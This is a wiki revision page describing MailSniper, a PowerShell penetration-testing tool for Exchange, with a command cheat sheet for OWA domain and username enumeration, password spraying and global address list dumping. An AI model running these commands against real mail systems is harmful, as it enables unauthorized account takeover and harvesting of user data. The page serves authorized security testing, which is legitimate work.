MailSniper: Difference between revisions

From RCATs
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
[[Category:Tools]]
[[Category:Tools]]
==Description<ref>https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/</ref>==
==Description<ref>https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/</ref>==
MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email or by an Exchange administrator to search the mailboxes of every user in a domain.
MailSniper is an open-source reconnaissance and enumeration tool written in PowerShell. It is designed to help security professionals and penetration testers gather information about email accounts and test the security of email systems. MailSniper can be used to perform various tasks such as enumerating email addresses, usernames, and other related information, as well as testing the security of email accounts by attempting to brute force passwords or conducting phishing attacks.
 
MailSniper is particularly useful for organizations that need to test the security of their email systems. It allows security professionals to identify vulnerabilities and weaknesses in their email infrastructure before they can be exploited by attackers. Additionally, MailSniper is a popular tool among penetration testers and ethical hackers, who use it to test the security of their clients' email systems.


==Commands<ref>https://github.com/dafthack/MailSniper</ref>==
==Commands<ref>https://github.com/dafthack/MailSniper</ref>==
Line 13: Line 15:
# Password spray valid usernames with specific password
# Password spray valid usernames with specific password
Invoke-PasswordSprayOWA -ExchHostname mail.name.io -UserList valid.txt -Password P@assword1234
Invoke-PasswordSprayOWA -ExchHostname mail.name.io -UserList valid.txt -Password P@assword1234
# Get the global address list with valid credentials
Get-GlobalAddressList -ExchHostname mail.cyberbotic.io -UserName cyberbotic.io\validuser -Password validP@assword1234 -OutFile .\Desktop\results.txt
</syntaxhighlight>
</syntaxhighlight>


==References==
==References==

Latest revision as of 13:05, 22 February 2023

Description[1]

MailSniper is an open-source reconnaissance and enumeration tool written in PowerShell. It is designed to help security professionals and penetration testers gather information about email accounts and test the security of email systems. MailSniper can be used to perform various tasks such as enumerating email addresses, usernames, and other related information, as well as testing the security of email accounts by attempting to brute force passwords or conducting phishing attacks.

MailSniper is particularly useful for organizations that need to test the security of their email systems. It allows security professionals to identify vulnerabilities and weaknesses in their email infrastructure before they can be exploited by attackers. Additionally, MailSniper is a popular tool among penetration testers and ethical hackers, who use it to test the security of their clients' email systems.

Commands[2]

# Enumerate Netbios name
Invoke-DomainHarvestOWA -ExchHostname mail.name.com

# Uses timing attack to validate possible usernames with OWA server
Invoke-UsernameHarvestOWA -ExchHostname mail.name.io -Domain name.io -UserList possible.txt -OutFile valid.txt

# Password spray valid usernames with specific password
Invoke-PasswordSprayOWA -ExchHostname mail.name.io -UserList valid.txt -Password P@assword1234

# Get the global address list with valid credentials
Get-GlobalAddressList -ExchHostname mail.cyberbotic.io -UserName cyberbotic.io\validuser -Password validP@assword1234 -OutFile .\Desktop\results.txt

References